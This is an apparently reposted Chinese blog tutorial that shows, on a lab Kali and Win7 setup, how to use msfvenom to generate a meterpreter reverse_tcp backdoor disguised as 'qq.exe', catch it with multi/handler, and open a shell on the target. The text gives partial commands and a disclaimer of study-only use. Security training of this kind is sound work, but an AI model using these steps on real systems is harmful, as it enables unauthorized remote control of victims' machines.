msf生成后门拿shell

admin 2023年12月8日12:28:02评论11 views字数 645阅读2分9秒阅读模式

#############################

免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提学习,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。

##############################

msf生成后门拿shell

kali 172.18.5.118

靶机  172.18.5.240

先尝试能不能ping通

msf生成后门拿shell

好的可以 那我们进行下一步

0X01爱之初体验

先在kali终端输入msfvenom -l,打开payload目录

msf生成后门拿shell

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

msf生成后门拿shell

 

 然后将生成的qq.exe移到靶机然后打开msfconsole

 使用该攻击模块监听 use exploit/multi/handler

然后设置payload

msf生成后门拿shell

 

 

 在show options 发现还有未设置的

msf生成后门拿shell

设置LHOSTkali地址

msf生成后门拿shell

然后run开始监听

msf生成后门拿shell

 

 

这时我们打开靶机qq.exe文件就能看到Kali这边获取到一个Session

msf生成后门拿shell

输入jobs退出继续输入sessions -l查看session列表

msf生成后门拿shell

这里有一个session列表,sessionid1

我们输入sessions -i 1,与该session交互

msf生成后门拿shell

输入getuid查看用户信息

msf生成后门拿shell

输入systinfo获取系统信息

msf生成后门拿shell

输入shell即可获取win7shell

msf生成后门拿shell

不过用这样方式拿的shell普遍都是很低的,还需提权


原文始发于微信公众号(菜鸟小新):msf生成后门拿shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月8日12:28:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   msf生成后门拿shellhttp://cn-sec.com/archives/2278832.html

发表评论

匿名网友 填写信息